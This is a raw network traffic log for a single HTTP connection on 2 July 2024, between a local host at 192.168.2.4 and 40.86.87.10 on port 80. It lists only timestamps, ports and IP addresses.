Jul 2, 2024 07:31:14.398149967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398729086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398740053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398750067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398761034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398771048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398776054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398781061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398786068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398796082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398801088 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398804903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398821115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398825884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398833036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398844004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398852110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398858070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398863077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398873091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398878098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398883104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398894072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398906946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398927927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399750948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399760962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399770975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399780989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399789095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399799109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399807930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399810076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399817944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399827957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399838924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399838924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399849892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399861097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399862051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399871111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399879932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399882078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399892092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399902105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.399910927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.399955034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.516992092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517004013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517015934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517060995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517071962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517083883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517095089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517224073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517234087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517246008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517282963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517307997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517337084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517347097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517386913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517468929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517479897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517489910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517501116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517512083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517514944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517539978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517563105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517746925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517757893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517774105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517785072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517796040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517796993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517806053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517817974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517827034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517827988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517839909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517844915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517846107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517851114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.517859936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.517924070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518354893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518366098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518378019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518390894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518404007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518408060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518415928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518415928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518426895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518436909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518449068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518484116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518893003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518903017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518913031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518918991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518923998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518929005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518934011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518939972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518942118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.518944979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518950939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518956900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518966913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518973112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518984079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.518996000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519006968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519009113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.519016981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519048929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.519058943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.519644022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519663095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519673109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.519701004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.519714117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.549447060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.554270983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.934967041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.934992075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935003996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935046911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935061932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935071945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935082912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935089111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935087919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.935147047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.935271025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935281992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935292006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.935314894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.935340881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057221889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057254076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057265043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057296038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057332039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057343960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057370901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057377100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057408094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057472944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057482958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057492018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057508945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057540894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057698965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057708025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057717085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057732105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057740927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057748079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057750940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057760954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.057766914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.057789087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058010101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058020115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058029890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058044910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058075905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058245897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058255911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058264971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058275938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058285952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058294058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058295012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.058322906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058322906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.058345079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179409027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179425955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179436922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179471016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179481983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179491997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179497957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179501057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179538965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179539919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179548979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179558039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179563999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179568052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179572105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179578066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179609060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179688931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179721117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179744005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179779053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179821968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179831028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179840088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179856062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179873943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179923058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.179958105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.179979086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180011034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180082083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180090904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180097103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180104971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180114985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180136919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180233002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180267096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180638075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180676937 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180726051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180762053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180871010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180881023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180890083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180898905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180903912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180908918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180911064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180917978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180927992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180960894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.180985928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.180989027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.181021929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.181116104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.181128025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.181138039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.181147099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.181154966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.181157112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.181171894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.181206942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.638582945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.638616085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:15.643851995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:15.643862963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.042133093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.042332888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.093272924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.098066092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.479234934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.479253054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.479263067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.479298115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.479338884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.482513905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.487493038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.867860079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:16.867928028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.934720039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:16.940344095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.328524113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.328615904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.409965038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.410128117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.414755106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.414921999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.414975882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.415009975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415036917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415045977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415049076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.415050983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415097952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.415183067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415230989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.415236950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415246010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415255070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.415292025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.415308952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419476986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419501066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419538021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419559002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419631004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419641018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419661045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419686079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419713020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419724941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419732094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419760942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419792891 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419826984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419892073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419941902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419950008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.419956923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.419981003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.420005083 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.420106888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.420155048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.420207024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:17.420332909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424180984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424305916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424367905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424411058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424457073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424465895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424474001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424494982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424503088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424520969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424573898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424582958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424617052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424663067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424670935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424679995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424690962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424699068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424715996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424767017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424777031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424786091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424819946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424900055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424910069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424918890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424938917 CEST	80	49730	40.86.87.10	192.168.2.4
